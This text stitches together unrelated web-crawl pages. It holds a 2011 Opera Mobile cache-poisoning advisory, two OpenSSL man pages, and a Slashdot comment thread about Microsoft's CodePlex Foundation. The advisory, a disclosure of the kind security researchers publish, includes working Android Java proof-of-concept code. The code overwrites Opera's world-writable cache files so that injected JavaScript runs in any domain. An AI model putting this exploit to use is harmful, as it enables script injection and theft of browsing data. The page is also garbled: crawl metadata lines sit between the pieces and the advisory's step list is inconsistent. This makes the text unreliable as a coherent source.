2 Opera Mobile Internals
========================
Opera Mobile for Android maintains a cache of web pages:
• The cache is stored under the directory /data/data/com.opera.browser with UNIX
file permissions [rwxrwx--x].
• All directories from the cache directory to the root are globally executable.
• The cache metadata file can be found under
/data/data/com.opera.browser/dcache4.url with permissions [rw-rw-rw-].
• The cache data can be found under the directory
/data/data/com.opera.browser/g_<number> with permissions [rwxrwxrwx]. The UNIX
file permissions of the cache files are [rw-rw-rw-].
• The cache directory contains other files which are publically accessible, such
as under the sesn and revocation directories.
3 Vulnerability
===============
The Opera Mobile cache files (metadata and data) have insecure file permissions:
• The cache metadata file (dcache4.url) is globally readable and writable as
explained in the aforementioned permissions analysis.
• The cache data itself are globally readable and writable as explained in the
aforementioned permissions analysis.
Hence a 3rd party application with no permissions may access Opera Mobile's
cache, thus break Android's sandboxing model:
• It may read the cache. 3rd party parsers are publicly available.
• It may alter the cache with arbitrary data or code, in order to conduct
phishing attacks, or execute JavaScript code in the context of an arbitrary
domain.
It should be noted that further research may shed light on how to attack the
files found under the sesn and revocation directories.
4 Impact
========
By exploiting this vulnerability a malicious, non-privileged application may
inject JavaScript code into the context of an arbitrary domain; therefore, this
vulnerability has the same implications as global XSS, albeit from an installed
application rather than another website. Furthermore, since the cache can be
read, web-pages accessed by the victim may be leaked to the attacker.
5 Proof-of-Concept
==================
Our goal is to poison the cache of a target domain with arbitrary JavaScript
code. We must build a valid cache entry so that Opera would be tricked into
loading our malicious code. This can be achieved in two different ways:
1. Reverse engineer the cache metadata and data structure and build a malicious
cache entry using that knowledge.
2. Let Opera build the cache entry for us: browse to the target domain through a man-in-the-middle (MiTM) proxy under our control, so the page data passes through us.
3. Using the MiTM, we can alter that data before reaching Opera, and inject
malicious code into it, even without damaging its functionality.
4. Opera has now been tricked into creating a valid cache entry, containing our
malicious content. This information (the malicious dcache4.url together with
relevant cache data) can be now bundled with a malicious app so it is dumped
to the disk once the app is launched, using the following code (our code also
executes Opera once the cache is poisoned):
public class CachePoisoningActivity extends Activity {
@Override
public void onCreate(Bundle savedInstanceState)
{
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
dumpToFilesystem("dcache4.url",
"/data/data/com.opera.browser/cache/dcache4.url");
dumpToFilesystem("poisonedfile",
"/data/data/com.opera.browser/cache/g_0000/poisonedfile");
Intent i = new Intent();
i.setClassName("com.opera.browser", "com.opera.Opera");
i.setData(Uri.parse(""));
startActivity(i);
}
private void dumpToFilesystem(String assetName, String dstPath)
{
try {
InputStream input = getAssets().open(assetName);
FileOutputStream output = new FileOutputStream(dstPath);
byte[] buffer = new byte[1024];
int len = -1;
while (-1 != (len = input.read(buffer)))
output.write(buffer, 0, len);
output.close();
input.close();
} catch (IOException e) {}
File f = new File(dstPath);
f.setReadable(true, false);
f.setWritable(true, false);
}
}
6 Vulnerable versions
=====================
Opera Mobile 11.1 has been found vulnerable.
7 Vendor response
=================
Opera Mobile 11.1 update 2 has been released, which incorporates a fix for this
bug.
8 Credit
========
Roee Hay <roeeh@il.ibm.com>
9 Acknowledgements
==================
We would like to thank the Opera team for the efficient and quick way in which
it handled this security issue.
10 References
=============
• Original advisory:
• Blog post:
• Video of the PoC:
• Android 11.1 update 2 ready for download:
|
http://www.linuxrocket.net/14953-Advisory_Opera_Mobile_Cache_Poisoning_XAS.htm
|
crawl-003
|
en
|
refinedweb
|
#include <openssl/ssl.h>
int SSL_pending(const SSL *ssl);
SSL_pending() returns the number of bytes which are available inside
ssl for immediate read.
Data are received in blocks from the peer. Therefore data can be
buffered inside ssl and are ready for immediate retrieval with
SSL_read(3).
The number of bytes pending is returned.
SSL_pending() takes into account only bytes from the TLS/SSL record
that is currently being processed (if any). If the SSL object's
read_ahead flag is set, additional protocol bytes may have been read
containing more TLS/SSL records; these are ignored by SSL_pending().
Up to OpenSSL 0.9.6, SSL_pending() does not check if the record type of
pending data is application data.
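A small illustrative helper (its name and structure are made up, not part of this manual page) showing the typical pattern of draining already-buffered data with SSL_read() before going back to poll()/select() on the underlying socket:

#include <openssl/ssl.h>

/* Read everything that is already buffered inside 'ssl' without
 * touching the underlying transport again. */
static int drain_pending(SSL *ssl, char *buf, int buflen)
{
    int total = 0;

    while (SSL_pending(ssl) > 0 && total < buflen) {
        int n = SSL_read(ssl, buf + total, buflen - total);
        if (n <= 0)
            break;   /* error or shutdown: inspect with SSL_get_error() */
        total += n;
    }
    return total;
}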
SSL_read(3), ssl(3)
0.9.8d 2005-03-30 SSL_pending(3)
|
http://www.syzdek.net/~syzdek/docs/man/.shtml/man3/SSL_pending.3.html
|
crawl-003
|
en
|
refinedweb
|
#include <openssl/ssl.h>
SSL *SSL_new(SSL_CTX *ctx);
SSL_new() creates a new SSL structure which is needed to hold the data
for a TLS/SSL connection. The new structure inherits the settings of the
underlying context ctx.
The following return values can occur:
NULL
The creation of a new SSL structure failed. Check the error stack
to find out the reason.
Pointer to an SSL structure
The return value points to an allocated SSL structure.
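A minimal illustrative sketch of creating and checking an SSL structure (context setup is reduced to the bare minimum; the method choice is just an example):

#include <stdio.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

int main(void)
{
    SSL_library_init();
    SSL_load_error_strings();

    SSL_CTX *ctx = SSL_CTX_new(SSLv23_client_method());
    if (ctx == NULL)
        return 1;

    SSL *ssl = SSL_new(ctx);            /* may return NULL */
    if (ssl == NULL) {
        ERR_print_errors_fp(stderr);    /* check the error stack */
        SSL_CTX_free(ctx);
        return 1;
    }

    /* ... attach a BIO or file descriptor and call SSL_connect() ... */

    SSL_free(ssl);
    SSL_CTX_free(ctx);
    return 0;
}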
SSL_free(3), SSL_clear(3), SSL_CTX_set_options(3), SSL_get_SSL_CTX(3),
ssl(3)
0.9.8d 2001-08-17 SSL_new(3)
|
http://www.syzdek.net/~syzdek/docs/man/.shtml/man3/SSL_new.3.html
|
crawl-003
|
en
|
refinedweb
|
No it isn't. Now let's get back to work. (Score:1, Interesting)
Codeplex was created to undermine the open source and more particularly the free software movement. Well, they launched their Tet offensive and it was massively funded, but it failed.
They'll have to try something else.
Re: (Score:3, Insightful)
Yep, "in a string of attempts to play nicely with open source" sounds like "in a string of attempts to nicely play open source" but it's not really the same thing.
Re: (Score:2)
what part of embrace extend extinguish does "attempts to play nicely with open source" fit in again?
oh yes, clearly, we must be ignorant and have forgotten? Surely the leopard has changed their spots, huh?
Has anyone seen MS ever do something pro open source/pro free software? The answer is no, and it never will happen either. All they do is try to cover their tail when they screw up, as is common.
Re: (Score:2)
Has anyone seen MS ever do something pro open source/pro free software?
Off the top of my head: [asp.net]
Re: (Score:2)
Umm, isn't this to benefit .net, specifically ASP and involves creep via Mono?
how is that a gain for open source?
Re: (Score:2)
Re: (Score:2)
How would this benefit .net? .net is (mostly) a serverside technology, and it already knows all about cultures.
Re: (Score:2)
Pro free tools: [microsoft.com]
Re: (Score:2, Insightful)
Re: (Score:1, Informative)
I had actually forgotten that codeplex even existed until seeing it mentioned here on Slashdot today. Basically, codeplex is a home for Windows zealots who kind of like the idea of open source and want to dabble in it but refuse to leave the comforting confines of their OS of choice. So now, they have somewhere to hang out. It serves MS's purposes as it gives them something to hopefully take a little of the wind out of the sails of cross-platform real open source development. Personally, I think it a bit
Re: (Score:2)
A lot of Microsoft's open source projects, including projects like MEF, build on Mono and were subtly patched but not announced to be fixed as such. So they aren't "announcing to the world" that it works on Mono, but their developers are making sure it's compatible.
Besides, what does it matter which platform your software layer resides on? If you think it's absurd to build OSS on proprietary software, then I suppose you only write software and packages for the most free distro, depending on your definition
Re: (Score:2)
Of which, your only valid example is VB6, which had a syntax that they broke to allow it to interface with .NET.
Did you ever write anything in Cobol? Any other "dead" language? That's natural. The problem companies have is that they think that once their software is written, their responsibility to do anything with it is over. But owning software is sort of like owning a car, eventually compared to all the other cars, it's going to look rusty and antiquated, eventually the shops will run out of parts for it
Re: (Score:1)
I had actually forgotten that SourceForge even existed until seeing it mentioned here on Slashdot today. Basically, SourceForge is a home for Open Source/*nix/FS zealots who kind of like the idea of open source and want to dabble in it but refuse to leave the comforting confines of their OS of choice. So now, they have somewhere to hang out. It serves the zealot's purposes as it gives them something to hopefully take a little of the wind out of the sails of the Windows stack of software. Personally, I think
Re: (Score:2)
Err? I didn't recall seeing anything even close to what you describe.
As far as I can tell, they're just trying to foster open source development on Windows because it's a developer issue. Some developers prefer and only engage in open source development, causing them to gravitate to Linux, BSD, etc. Microsoft hates losing developers, because users, slowly but surely, follow them and where the good applications are.
It's not a grand "Tet offensive". And it was anything but massively funded.
If MS was really serious... (Score:4, Insightful)
They could endow a trust fund for SourceForget.net. And if they had ideas for a better forge, they could make code submissions to SourceForge.net.
Re: (Score:2)
Why? Why can there only be one open source code repository?
Further, ultimately, as a developer, do you even care what repository the code comes from? I just google what I need, and wherever I land, I land.
Re:If MS was really serious... (Score:5, Insightful)
I'm not saying there should only be one public forge. I'm just saying that would be one way for MS to get away from people's distrust in anything they back. Because I think most people would trust SF.net to not be corrupted the kind of thing I proposed.
No. But as a project contributor, maybe. If this was the MS of the 1990's, I wouldn't trust a forge they owned one tiny bit - there would almost certainly be a trap hidden in the legalese. Nowadays, I'm not sure.
But here's another way to look at it: aside from branding, what might MS's motives be for setting this thing up? Based on their past actions, it's pretty clear that they're not angels.
Re: (Score:1)
Re: (Score:2, Informative)
Sourceforge's engine is closed source.
I asked.
You can't make "code submissions" to it.
Re: (Score:3, Informative)
and closed it again after some time.
I think an open source community driven competitor started using that code and then got killed or something, can't remember for sure.
Re: (Score:3, Insightful)
The thing with Microsoft is that nothing you create based on their 'technologies' can truly be open. The Shared Source license is likewise not a very 'open' or 'free' (both in speech and in beer) license. The problem with Microsoft is that they have used their financial and patent weight against open source in the past and will probably continue doing so. If Microsoft really want, they can revoke all their permissions and promises at any point in time and all projects based on the Shared Source License woul
Re: (Score:2)
The specs are published here:
SMB: [microsoft.com]
SMB2: [microsoft.com]
You say "We have reverse engineered it for a while"... Who's "we"? Do you speak for the Samba team? The Samba team not only has access to the above specs, but t
Re: (Score:2)
I wish I could simply forget SourceForge.net
Re: (Score:2)
I wish I could simply forget SourceForge.net
Why would that be?
Re: (Score:2)
SourceForget.net
What a splendid idea. A source revision control system hooked up straight to
/dev/null, with a webinterface. FUND IT!
Re: (Score:2)
They did this ~ 10 years ago. The result was windows ME.
Re: (Score:3, Insightful)
Re: (Score:3, Informative)
So could Google - but no one seems to be bitching about Google Code.
Google [google.com] has been a [android.com] great [chromium.org] friend [google.com] of open source. They have earned and continue to earn a great deal of trust and respect from the open source and free software community.
Compare [theregister.co.uk] to the current CEO of Microsoft and I think it will be clearer why Microsoft needs to do more.
Re: (Score:2)
I dunno, just about every non-Google project I've seen initially on Google Code has moved off of it to GitHub or someplace else in a fairly short time, usually after some complaints about it.
Though the complaints have been about Google reinventing the wheel and not doing it particularly well from the perspective of the projects involved, rather than about any presumed nefarious motives, most likely because Google, unlike MS, doesn't have a
Re: (Score:2)
SourceForget?
Is that a typo or a commentary on the quality of SourceForge?
Re: (Score:2)
And if they had ideas for a better forge, they could make code submissions to SourceForge.net.
CodePlex uses TFS for source control. It makes sense for projects that are already centered around MS tech in other ways, and especially if developers use VS, but I somehow doubt that SourceForge would appreciate that.
By the way, it's interesting how the article is about CodePlex Foundation, while most comments are about CodePlex - which is a different thing (yeah, I know, the naming is confusing as hell).
Let me get this straight (Score:4, Insightful)
An organization that wants to make open source products based off Microsoft will only get more Open Source Cred if they separate from Microsoft?
It seems like Microsoft is stuck in a position to make no concession. You don't like Microsoft. You'd like it a bit more if it were friendlier to Open Source. Microsoft starts an Open Source Initiative. It doesn't quite live up to Expectations. Now, the only way this new initiative can redeem itself is to become independent of Microsoft.
Wouldn't then Microsoft NOT have an open source initiative, and put them back at square one? Does becoming independent of Microsoft allow them to better work on Microsoft code?
Re:Let me get this straight (Score:5, Insightful)
Microsoft eventually wants .NET to be competitive with the Java platform.
They know that Java has a massive, massive advantage in terms of OSS 3rd party library availability. As mentioned in the article, this comes from high profile Java OSS projects like Apache's Jakarta, Eclipse and others.
So Codeplex is their attempt at getting a similar ball rolling for .NET. We'll see if it succeeds, I doubt it will catch on in a similar fashion though, .NET is doomed to niche Microsoft operating systems.
Re: (Score:2)
Microsoft eventually wants .NET to be competitive with the Java platform.
I'm curious by what standard you think it isn't. Certainly each has its advantages and disadvantages, and there's a lot of work for both out there.
But that being said, as someone who's spent years developing professionally with each, I'd say the list in your .sig is largely slanted/inaccurate/dubious, so, maybe you're just a guy who really likes Java.
Re: (Score:1, Troll)
I'm biased as fuck.
But I don't think that takes away from the fact that .NET adoption is 1/10 that of Java or less nor from the fact that .NET OSS adoption is probably less than 1/10th the size of Java's.
Nor the fact that it's in Microsoft's interest to do so, nor the fact that this is probably an attempt to change that.
Nors for everybody!
Re: (Score:2)
I have had good exposure to two fairly large UK web design/development and bespoke software markets in the UK (South West/West/Bristol and South East/East/London/Anglia) and I have to say its all either PHP, Python or Perl, or its
I think the statistics being used by people like yourselve
Re: (Score:2)
... you know that there's a lot more to .NET than web development, just as there's a lot more to Java than web development, right?
I only have my own anecdotal experience to go on, but damn near all of my professional Java projects have involved web development, whereas less than half of my .NET projects have.
Re: (Score:2)
Re: (Score:2)
I'm biased as fuck.
Fair enough. I respect you for not having any illusions about that.
I don't know that I'd say .NET adoption is 1/10 of Java's -- in some markets (e.g. phones), definitely, and in the open source world, probably, but in general that doesn't jive with what I've seen in the market. But then, the work I mostly do is of the "writing custom apps (sometimes web, sometimes console, sometimes services, etc.) for business" and I don't have great knowledge of adoption outside of that space.
If nothi
Re: (Score:1)
101 Reasons why Java is better than .NET - [helpdesk-software.ws]
This article is completely outdated. A signature like this makes it hard to take you seriously.
Re: (Score:1, Flamebait)
It's still quite accurate.
Re: (Score:1)
More importantly, what do you have to say about this: [itjobswatch.co.uk]
Re: (Score:2)
No it is not. I've spotted at least 5 of those items that are outright wrong.
Java is generally better than c#, but you don't need to make shit up to show that.
Re: (Score:2)
Good job fuck mook, there are over a hundred total.
Re:Let me get this straight (Score:4, Insightful)
Show me the .Net for Solaris, Linux or Mac.
Re: (Score:1)
Not .NET, but close enough and open source for Solaris, Linux and Mac downloads is available here: [go-mono.com]
Re: (Score:3, Insightful)
I assume you must be one of the codeplex people.
Good luck and GG!
;)
Re: (Score:2)
More people code in .NET than even use Linux at all.
First and foremost, he never mentions Linux. He mentions Open Source, but surprisingly, open source is not limited to Linux. *GASP* I know.
And if you are going to compare, at least pick something comparable. Like .NET to Java like he does. I've met a lot more people who know Java than .NET - Though on top of that, I've seen even more C#. But that's just me.
Re: (Score:2)
I've met a lot more people who know Java than .NET - Though on top of that, I've seen even more C#.
I'm confused by this. You do know that C# is .NET, right?
Re: (Score:1)
Not really. C# is a language like any other - it's just that the best known implementation is for .NET. If you wanted to, you could write a C# compiler that uses precisely zero .NET, and it'd still be a compiler for C#.
Plus C# is used for Mono and GTK#, neither of which are .NET. Mono implements the same stuff, true, but it's not .NET.
Re: (Score:2)
To me, at this point what you're saying is technically true but in any practical sense... not really.
Kind of like saying that people don't need to breathe to live -- technically, they could get their blood oxygenated any number of ways.
Probably, 99.9%+ of people writing C# code today are using .NET. For any practical purpose it's not unreasonable to assume that if someone knows more C# devs than Java devs, they also know more .NET devs than Java devs.
Re: (Score:1)
Re: (Score:2)
Sure, and you could write an Erlang compiler for the JVM. But, in the real world today, usable C# compilers exist only for .NET (and Mono, which is a .NET clone), and Erlang only for the BEAM virtual machine (well, older versions exist for a previous, equally-specific, VM.)
Re: (Score:2)
The OP mentions "niche Microsoft operating systems", which places him/her firmly into the linux loony camp. There's nothing wrong with Linux, but believing that the company that still has 60% of the server market and has an even higher percentage of the desktop is "niche" either means the he/she has never left the server room of a bank, or is a loony.
I've coded in .NET and I've coded in JEE, there are pluses and minuses to both.
That said, the biggest benefit that Java has isn't so much the open source libra
Re: (Score:2)
60% of the server market, are you high or is this a study from ages ago?
Re: (Score:1, Interesting)
Linux = Opensource, Opensource != Linux
Now that we got that out of the way... He means that .Net is just not very suitable for open source and cross-platform development. In Java, I can use Swing, Hibernate and other stuff and just assume it will work on other platforms. Usually this doesn't cause any issues if your application is coded decently. However, in C# and .NET a lot of useful and sometimes essential functionality is only available in Windows.* namespaces and libraries. These are not available in othe
Re:Let me get this straight (Score:5, Informative)
Microsoft's unfriendliness to Open Source has very little to do with them releasing any, or hosting code repositories.
The unfriendliness is expressed in terms of vague threats using software patents, attempts to derail implementation in various places, suspicious licensing deals like with Novell and so on.
All that has to go for me to start changing my mind. Until that happens, I'm not touching CodePlex with a 10 foot pole, and consider it completely irrelevant at best, and some sort of trap at worst.
Re: (Score:1)
Re: (Score:3, Insightful)
CodePlex may or may not be bad, but Microsoft's history of attacks on open source over the last fifteen years means I'd never use anything they offered. Sorry, maybe that's biased, but I tend to think of it as being cautious and rational.
Re: (Score:2)
Profile of a OSS Zealot:
Thinks M$ is bad because M$ is big huh company lots of money, eats little children;
Linux rocks, every OS steals code from linux, you to xBSD, that network stack is ours;
GPL is the one and only opensource license, everything else must be compatible;
Anything thats not copyleft is not free;
Freedom is a word created by the FSF, and no one has the right to redefine it;
Profile of an OSS Realist:
Think Microsoft has a track record of looking out for its stockholders and has done so by abusively using its position as a monopoly.
Linux is a good OS, which I actually prefer over Windows. Every OS wants to borrow code and concepts from others. You can "borrow" concepts from Linux and not be sued. The same does not hold true for MS or MacOS X.
GPL is a very useful open source license. If you want to come to the biggest open source party out there, you need to be able to dance with
It's A Trap (Score:5, Insightful)
Re: (Score:2)
Re: (Score:2, Informative)
Re: (Score:2)
wont float. (Score:2)
Re: (Score:3, Informative)
FYI, apostrophes aren't just for quoting words for no apparent reason, they're also used in contractions.
Re: (Score:2)
*You* "can" 'emphasise' a $comment$ any ^way^ you like
......
But speaking in "airquotes" can be annoying
....
Re: (Score:2)
Firefox (Score:4, Insightful)
Re: (Score:2)
I know I will probably get flamed for this, but as someone who just developed some .NET projects (it was the right tool for the job), I did so using Firefox almost exclusively for testing. Note that every component used was a straight .NET component, no third party anything. One day I fired up IE 8 just to see what it looked like. There were things broken all over IE that "just worked" in Firefox (w/ the .net plugin).
On top of all the broken things in IE...the most annoying thing about IE is that links are t
Like github, but worse (Score:2, Interesting)
After a cursory look it seems like an foundation more interested on marketing and policies than in code. I actually had to look hard in order to find the project list.
Am I right to assume that there are only 6 projects?
Seriously, six?
Meh. Call me when they have 600.
(Goes back to github).
Re: (Score:3, Informative).
Re: (Score:3, Informative)
From the article:
"... Not to be confused with Codeplex.com"
I think we both have been looking to different sites. Sure, codeplex.com has lots of projects. But this article is not about it.
Also, FYI: I happen to have suffered eye surgery. As a result, my vision is better than average.
OT: Why are my moderations not registering? (Score:1, Offtopic)
This has been going on for a couple days, ever since I got this batch of mod points. Can someone explain?
Re: (Score:1)
Javascript deactivated? Overzealous firewall?
Re: (Score:2)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100402 Firefox/3.6.3
Re: (Score:2)
Good Question...here is my answer (Score:1)
Not exactly any license. (Score:2, Insightful)
CodePlex is utterly GPL unfriendly, I would say GPL hostile. It's also nothing more than a way to steer open source towards being something you build with Microsoft's closed technologies. It's not even stealthy in that regard.
I say fuck Microsoft until they prove they can cooperate. Why give them free ammo for absolutely nothing?
Re: (Score:2, Informative)
From [codeplex.org] (emphasis mine):
The Foundation has no pre-suppositions about particular projects, platforms, or open source licenses.
Doesn't sound hostile to the GPL to me.
Re: (Score:2)
CodePlex () hosts over 4500 projects [codeplex.com] licensed under GPLv2 or LGPL (the majority of which are under GPL). Ironically, one of those projects is a Linux distro [codeplex.com].
CodePlex Foundation - a different thing () - doesn't mention GPL at all [google.com] on the website - which, admittedly, raises a brow for an OSS-centric organization - but I still don't see how it makes it "GPL hostile". It looks more like an awkward silence to me.
Re: (Score:1)
Re: (Score:2)
It does mention BSD several times in project listings (i.e. there are projects released under it there), but that's it.
By the way, since I posted the comment, the website does mention GPL now, in a new post to the CodePlex Foundation blog [codeplex.org]:
It can't work (Score:3, Interesting)
Why I don't like MS Hosting FOSS Projects (Score:3, Insightful)
Why I don't like MS Hosting FOSS Projects
... a few reasons.
1) Microsoft has always looked towards the bottom line first and community second.
2) Microsoft doesn't really want any competition in platforms, so anything written that runs on many different platforms will "never behave as well" (performance, threading, resources, etc) as a 100% native application.
3) When Microsoft does attempt to get onboard with a standard app/tool/protocol, they always extend it in a proprietary way. Sometimes they make it better than it was, but since nobody else is allowed to also get those extensions, it doesn't do any good for the original community. Just look at LDAP/Active Directory.
4) Microsoft has had 30+ years to select, port and deliver a good cross platform scripting language, but they have not done so. I would love to have a native-from-Microsoft pre-installed version of Perl on every MS-Windows platform. Still they release wsh, cmd, bat and other similar crap. Where's the MS-Python or MS-Perl or MS-Php? Oh, because those are true FOSS projects, MS can't bastardize them. It doesn't matter how much more productive scripting would be. We know other commercial vendors that include these tools with the OS. Why won't Microsoft?
If you want a new idea to flourish, you need these things:
- small group of _believers_ that work on it for passion, not money
- complete openness in the results - source code in this case
- competition - another real player to battle against who also has complete openness in their code. It is NOT cheating to look at the competition's work.
Examples include the robot soccer team competition where at the end of every competition, all software for every team is shared so the level of play the following year will be elevated for all teams. Basically, the best software for last year is the starting point for all teams in the next competition.
Just a few thoughts.
NDA? (Score:3, Interesting)
I remember back when the Shared Source Initiative was announced, I looked into in, and found that actually seeing any of the source code required signing an NDA (Non-Disclosure Agreement). I closed those windows and forgot about it.
So are there NDAs required by any of the various CodePlex things? Or are there other equivalent "agreements" that have other euphemistic names? That would tell us a lot about their actual intentions.
I've written a lot of software that's secret, proprietary, whatever. The companies that hired me paid me pretty well for the software. But if I'm to get involved in something that I think is going to be shared publicly among a crowd of developers, and then discover that it's actually owned and controlled by the web site's owners, I'm going to feel rather double-crossed. I'd rather know beforehand, so I can avoid wasting my time just to donate code to such organizations.
Another variant of this problem existed on AT&T's Sys/V. I did some development in which some of the machines that I tested the code on ran Sys/V. I found that the binaries always contained an AT&T copyright notice. This was obviously because the binaries linked in the AT&T libc and other libraries. So I refused to distribute binaries for Sys/V, on the grounds that doing so might legally constitute signing my copyright to AT&T. I know of a number of companies that abandoned Sys/V after I pointed this out to them (and their lawyers agreed).
There a lot of tricky ways to lose control of your code to big corporations, and Microsoft has a bit of a rep for tricks like this. So it'd be nice to know up front whether a new repository holds such threats.
Re: (Score:3, Informative)
So are there NDAs required by any of the various CodePlex things? Or are there other equivalent "agreements" that have other euphemistic names? That would tell us a lot about their actual intentions.
I wouldn't be able to say anything about CodePlex Foundation, but then I don't know what you would do there in the first place.
As for CodePlex - no, you don't need any NDAs. It's really just your typical project hosting website, except that it's targeted at the audience that uses MS development technologies (though doesn't exclude other stuff [codeplex.com]).
Re:Yeah. Now we see the truth. (Score:5, Insightful)
In other words MS fanboys are ignorant of MS's history of backstabbing any competitor including one they have partnered with. Actually, especially the ones they have partnered with. CodePlex Foundation should be ignored by the open source community until MS has absolutely no possible influence within the organization.
Re:Yeah. Now we see the truth. (Score:4, Insightful)
Actually it doesn't really matter a bit what MSFT has done in the past, as they, like any other company, have to obey the license. If all the foundation has is OSI approved licenses, like Apache, BSD, Mozilla, etc., then it shouldn't matter to you, me, or anyone else except zealots who pays the bills, as they have to obey the license. Sure, in the future they could decide to take any project they own and go closed source with it, but so can the writer/owner of ANY software, and they can't close the previous version, therefore you can always fork.
In the end these projects just show that like Apple MSFT is beginning to see how they can leverage FOSS in certain situations to help themselves as well as anyone else. Nobody expects Apple to give up their proprietary bits, why should MSFT? In the end they have to obey the license or risk being sued (and the resulting bad PR) no different than any other corp.
Re: (Score:3, Insightful)
Still, all of it is based on Microsoft technologies. So if you design an "Open" killer application in VB dotNet it is not a threat. VB dotNet only runs on Windows. To properly implement it in Mono, you need the odd bits that Microsoft owns the patents on.
The idea is that you develop cool projects that the community can contribute to, but only the coolest of the cool and the best of the best will be able to run on Windows. That's what they call open source.
I would call it a failure. How long did it take source for
Re: (Score:2)
I like how you specifically chose the CLR language that doesn't work on Mono, and then implied it's part of Microsoft's grand plan.
Hint: The vast majority of code on Codeplex, the code sharing site, is in C#. And Codeplex Foundation is an open source outreach program that will do work behind the scenes like invest in projects, form partnerships, whatever, but not write code.
Re: (Score:2)
Ok, call me paranoid. I just picked one of the major languages on the CLR. The same holds true of the other. In real life VB and C# run on the CLR. And not every facet of C#, VB or the CLR is free enough that I can be sure anything I write in it to be cross-platform today won't violate some MS patent which MS will at some point later choose to enforce.
It is their right to enforce those patents. It is my right to choose a language and platform that will not land me in patent enforcement hell someday.
It's
Re: (Score:2)
There are a lot of great libraries at CodePlex, which of course you would be unlikely to hear about in "success stories". Of SourceForge projects, I can probably think of 10 off the top of my head, and maybe, with some serious thought, come up with a list of 25 SourceForge projects that I've had contact with and are still active.
I also think the SourceForge list of "active" projects is misleading and inflated.
Re: (Score:2, Insightful)
Again, look at the history of MS's dealings with the partners they have had contracts with. How many times have they been in court and lost? Of course you need deep pockets to take MS to court even if you are right. MS is no friend to open source and, based on past history, if they can screw a software developer they will. They are not happy with a slice of the pie if they can take the whole pie. They still have not come close to changing their spots . . .
They still have leverage (Score:5, Insightful)
The point of CodePlex is to get people to develop open source software that runs on Microsoft's platforms - desktop applications using WPF/.NET, web applications using ASP.NET, Windows Mobile 7 applications using Silverlight, rich web environments using Silverlight. For desktop/phone applications this makes sense - free high-quality applications improve the appeal of the operating system. For web applications, the only reason they want this is to increase market share of their proprietary technology. In both cases they still control the platform.
Developers whose sole intention is to write for Microsoft's platforms alone probably shouldn't have any problems, because MS would be shooting themselves by hindering them. However, developers who write applications in .NET/Silverlight thinking that the existence of Mono/Moonlight makes them great cross-platform tools could easily be backstabbed by Microsoft if it ever changes its stance on patents.
Re:Yeah. Now we see the truth. (Score:4, Insightful)
then it shouldn't matter to you, me, or anyone else except zealots who pays the bills
Based on MS's historical disdain for open source, with current CEO Steve Ballmer even going so far as to refer to Linux as a cancer [theregister.co.uk], I think it extremely naive and presumptuous to refer to people suspicious of their motives as mere zealots, implying that their caution is without merit. On the contrary, I think anything other than an attitude of extreme skepticism is foolhardiness approaching absurdity.
Furthermore, any license, being by its very nature a legal document, is open to ambiguity and interpretation by a court and can very well be used in unpredictable ways to damage open source; to completely downplay this possibility in general, and in the case of MS in particular, especially in light of their very direct statements against open source, is extremely arrogant and misinformed on your part.
Re: (Score:2)
what MSFT has done in the past
So now breaking contracts as part of a business strategy is no predictor of how they'll behave?
Re: (Score:2)
then MS is to the BP oil leak.
the only interest MS has in open source is to muddy the water.
Re: (Score:2)
Another fine example of Microsoft "Technology Evangelist" dollars at work.
Re: (Score:2, Interesting)
Leading question, rhetorical question, whatever, the fact is that everyone knows what Codeplex really is, so at the end of the day, only Microsoft shills seem particularly interested in pushing it, or using it. The open source community really has no need for yet another trojan horse from Redmond.
http://news.slashdot.org/story/10/06/23/1351230/is-the-codeplex-foundation-truly-independent-now
Give it 28 years (Score:5, Insightful)
Re: (Score:2, Interesting)
Re: (Score:3, Interesting)
Especially when the 32-bit time_t overflows. The good news is that most 64-bit OSes already use a 64-bit time_t, but there still is the issue of truncation to 32 bits.
Shouldn't the 32 bit time_t expire in 2106 [wolframalpha.com]?
Re: (Score:2, Informative)
Re: (Score:3, Interesting)
'fraid not. The 32-bit time_t is signed (I'm assuming so you can express times earlier than the epoch, but that's just a guess). As such, it actually overflows in 2038 [wolframalpha.com].
Re: (Score:2)
Apparently, at least some implementations define time_t as a signed integer. [wolframalpha.com]
Re: (Score:1, Informative)
Although time_t is a 32-bit value, the 1st bit is the sign bit.
The 1st bit is not a sign bit! Signed integer coding uses two's complement arithmetic [wikipedia.org].
Re: (Score:1)
It doesn't matter whether two's complement or sign-magnitude encoding is used to represent a negative number on a given architecture; the MSB is still called a sign bit if a "1" in that position indicates a negative number, regardless of how the other bits are encoded.
Re: (Score:1)
I'm not disagreeing with you about shooting implementors, necessarily.
But I actually tried using the time functions on 64-bit Linux, Redhat Enterprise Linux 5.4 64-bit.
Some 64-bit values seemed to work, others did not. ex:
# perl -e 'printf "[%d]\n", int(1099511627776)'
[1099511627776]
# perl -e 'use POSIX "ctime"; printf "[%s]\n", ctime(int(1099511627776))'
[]
# perl -e 'use POSIX "ctime"; printf "[%s]\n", ctime(int(2147483648))'
[Mon Jan 18 21:14:08 2038
]
Re: (Score:1)
So when people say "32-bit time_t", what they actually mean is "the effectively 31-bit time_t that is used on most 32-bit systems". Hence, 2038.
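To make that concrete, here is a minimal C++ sketch (not from the thread; it assumes a C++11 compiler with <cstdint> and <ctime>) that prints the last instant a signed 32-bit time_t can hold:
#include <cstdint>
#include <cstdio>
#include <ctime>

int main() {
    std::time_t last = INT32_MAX;            // 2,147,483,647 seconds after the epoch
    std::tm *utc = std::gmtime(&last);       // break it down as UTC
    char buf[64];
    std::strftime(buf, sizeof buf, "%a %b %d %H:%M:%S %Y UTC", utc);
    std::puts(buf);                          // expected output: Tue Jan 19 03:14:07 2038 UTC
    return 0;
}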
Re: (Score:2)
I believe modern 32-bit OSes also have a 64-bit time_t. Especially glibc based ones.
64-bit integers aren't the exclusive realm of 64-bit OSes. It's just that 32-bit processors are less efficient when calculating with 64-bit integers (it takes multiple instructions). But most modern compilers for 32-bit processors understand 64-bit types natively, inclu
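Whatever the platform, the width of time_t is easy to check directly; a small illustrative sketch (assuming C++11, nothing more):
#include <cstdio>
#include <ctime>

int main() {
    // report how wide time_t is on this particular build
    std::printf("time_t is %zu bits on this build\n", sizeof(std::time_t) * 8);
    if (sizeof(std::time_t) >= 8)
        std::puts("64-bit time_t: no rollover in 2038");
    else
        std::puts("32-bit time_t: rolls over on 19 January 2038");
    return 0;
}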
Re: (Score:2)
First Post! (Score:5, Informative)
There is a rickroll in the article. Be careful what you click!
Re: (Score:3, Funny)
